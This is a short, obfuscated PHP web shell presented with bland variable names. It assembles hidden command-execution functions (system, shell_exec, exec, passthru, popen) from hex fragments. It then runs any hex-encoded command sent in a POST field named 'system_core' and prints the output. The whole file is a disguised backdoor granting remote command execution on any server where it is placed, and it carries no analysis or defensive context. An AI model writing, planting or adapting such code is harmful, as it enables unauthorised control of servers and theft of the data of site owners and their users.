<?php


$holder1 = '7';
$holder2 = '3';
$holder3 = '4';
$holder4 = '6';
$holder5 = 'd';
$holder6 = '8';
$holder7 = '5';
$holder8 = 'f';
$holder9 = '0';
$holder10 = 'e';
$holder11 = '1';
$holder12 = 'c';
$holder13 = '9';
$sync_manager1 = pack("H*", $holder1.$holder2.'7'.'9'.$holder1.$holder2.'7'.$holder3.$holder4.'5'.$holder4.$holder5);
$sync_manager2 = pack("H*", '7'.$holder2.$holder4.$holder6.'6'.$holder7.'6'.'c'.'6'.'c'.$holder7.$holder8.'6'.$holder7.$holder1.'8'.'6'.$holder7.$holder4.'3');
$sync_manager3 = pack("H*", $holder4.'5'.$holder1.'8'.$holder4.'5'.$holder4.$holder2);
$sync_manager4 = pack("H*", $holder1.$holder9.$holder4.'1'.'7'.'3'.'7'.'3'.$holder1.$holder3.'6'.'8'.'7'.'2'.'7'.$holder7);
$sync_manager5 = pack("H*", $holder1.$holder9.$holder4.'f'.$holder1.$holder9.$holder4.'5'.'6'.$holder10);
$sync_manager6 = pack("H*", $holder1.$holder2.$holder1.'4'.$holder1.'2'.$holder4.'5'.$holder4.$holder11.$holder4.'d'.'5'.'f'.'6'.$holder1.'6'.'5'.$holder1.$holder3.$holder7.'f'.'6'.'3'.$holder4.'f'.'6'.'e'.'7'.$holder3.'6'.'5'.$holder4.'e'.$holder1.$holder3.$holder1.'3');
$sync_manager7 = pack("H*", $holder1.$holder9.'6'.'3'.$holder4.$holder12.'6'.$holder8.'7'.$holder2.'6'.$holder7);
$system_core = pack("H*", $holder1.$holder2.$holder1.$holder13.$holder1.'3'.'7'.$holder3.'6'.$holder7.$holder4.$holder5.$holder7.$holder8.$holder4.$holder2.'6'.$holder8.$holder1.'2'.$holder4.$holder7);
if (isset($_POST[$system_core])) {
    $system_core = pack("H*", $_POST[$system_core]);
    if (function_exists($sync_manager1)) {
        $sync_manager1($system_core);
    } elseif (function_exists($sync_manager2)) {
        print $sync_manager2($system_core);
    } elseif (function_exists($sync_manager3)) {
        $sync_manager3($system_core, $entity_factor);
        print join("\n", $entity_factor);
    } elseif (function_exists($sync_manager4)) {
        $sync_manager4($system_core);
    } elseif (function_exists($sync_manager5) && function_exists($sync_manager6) && function_exists($sync_manager7)) {
        $pgrp_property_set = $sync_manager5($system_core, 'r');
        if ($pgrp_property_set) {
            $object_itm = $sync_manager6($pgrp_property_set);
            $sync_manager7($pgrp_property_set);
            print $object_itm;
        }
    }
    exit;
}
